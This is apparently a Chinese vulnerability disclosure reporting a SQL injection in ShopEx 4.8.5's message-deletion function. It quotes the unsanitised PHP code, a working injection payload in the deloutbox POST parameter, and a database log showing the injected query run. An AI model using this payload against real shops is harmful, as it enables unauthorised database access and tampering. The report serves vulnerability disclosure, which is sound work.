### 简要描述: 无聊的sql注入 测试版本:shopex-singel-4.8.5.78660 ### 详细说明: 在文件:\core\shop\controller\ctl.member.php ``` function delOutBoxMsg() { if(!empty($_POST['deloutbox'])){ $oMsg = &$this->system->loadModel('resources/msgbox'); $oMsg->delOutBoxMsg($_POST['deloutbox']); $this->splash('success', $this->system->mkUrl("member","outbox"), __('删除成功')); }else{ $this->splash('failed', $this->system->mkUrl("member","outbox"), __('删除失败: 没有选中任何记录!')); } } ``` 和shopex注入漏洞#2一样的问题 ``` public function delOutBoxMsg( $aMsgId ) { foreach ( $aMsgId as $val ) { if ( $val ) { $aTmp[] = $val; } } if ( $aTmp ) { $this->db->exec( "DELETE FROM sdb_message WHERE msg_id IN (".implode( ",", $aTmp ).")" ); } return true; } ``` 提交:deloutbox[1]=1) and (select count(*) from sdb_operators)=1%23 ``` 130526 20:49:28 372 Connectroot@localhost on 372 Init DBshopex 372 QuerySET NAMES 'utf8' 372 QuerySELECT * FROM sdb_plugins WHERE plugin_type="app" 372 Queryselect * from sdb_plugins where plugin_type="app" and...
### 简要描述: 无聊的sql注入 测试版本:shopex-singel-4.8.5.78660 ### 详细说明: 在文件:\core\shop\controller\ctl.member.php ``` function delOutBoxMsg() { if(!empty($_POST['deloutbox'])){ $oMsg = &$this->system->loadModel('resources/msgbox'); $oMsg->delOutBoxMsg($_POST['deloutbox']); $this->splash('success', $this->system->mkUrl("member","outbox"), __('删除成功')); }else{ $this->splash('failed', $this->system->mkUrl("member","outbox"), __('删除失败: 没有选中任何记录!')); } } ``` 和shopex注入漏洞#2一样的问题 ``` public function delOutBoxMsg( $aMsgId ) { foreach ( $aMsgId as $val ) { if ( $val ) { $aTmp[] = $val; } } if ( $aTmp ) { $this->db->exec( "DELETE FROM sdb_message WHERE msg_id IN (".implode( ",", $aTmp ).")" ); } return true; } ``` 提交:deloutbox[1]=1) and (select count(*) from sdb_operators)=1%23 ``` 130526 20:49:28 372 Connectroot@localhost on 372 Init DBshopex 372 QuerySET NAMES 'utf8' 372 QuerySELECT * FROM sdb_plugins WHERE plugin_type="app" 372 Queryselect * from sdb_plugins where plugin_type="app" and plugin_ident='commodity_radar' LIMIT 0, 1 372 Queryselect * from sdb_plugins where plugin_type="app" and plugin_ident='shopex_stat' LIMIT 0, 1 372 Queryselect member_id,member_lv_id,email,uname,b_year,b_month,b_day,password,unreadmsg,cur,lang,point,experience from sdb_members where member_id=4 LIMIT 0, 1 372 QuerySELECT count(*) AS unreadmsg FROM sdb_message WHERE to_type = 0 AND del_status != '1' AND folder = 'inbox' AND unread = '0' AND to_id =4 LIMIT 0, 1 372 QuerySELECT plugin_name,plugin_ident FROM sdb_plugins WHERE 1 AND sdb_plugins.disabled = 'false' AND sdb_plugins.plugin_type='app' LIMIT 0, 20 372 QuerySELECT plugin_id,plugin_path,plugin_struct,plugin_config,plugin_base FROM sdb_plugins WHERE plugin_type='app' AND plugin_ident='commodity_radar' LIMIT 0, 1 372 QuerySELECT plugin_id,plugin_path,plugin_struct,plugin_config,plugin_base FROM sdb_plugins WHERE plugin_type='app' AND plugin_ident='shopex_stat' LIMIT 0, 1 372 QuerySELECT plugin_id,plugin_path,plugin_struct,plugin_config,plugin_base FROM sdb_plugins WHERE plugin_type='app' AND plugin_ident='pay_offline' LIMIT 0, 1 372 QueryDELETE FROM sdb_message WHERE msg_id IN (1) and (select count(*) from sdb_operators)=1#) ``` 查看sql执行记录已经ok ### 漏洞证明: [<img src="https://images.seebug.org/upload/201305/2620515382c567c31d4d770a1da5678351643db9.jpg" alt="2013-05-26_205142.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201305/2620515382c567c31d4d770a1da5678351643db9.jpg) 哎,体力活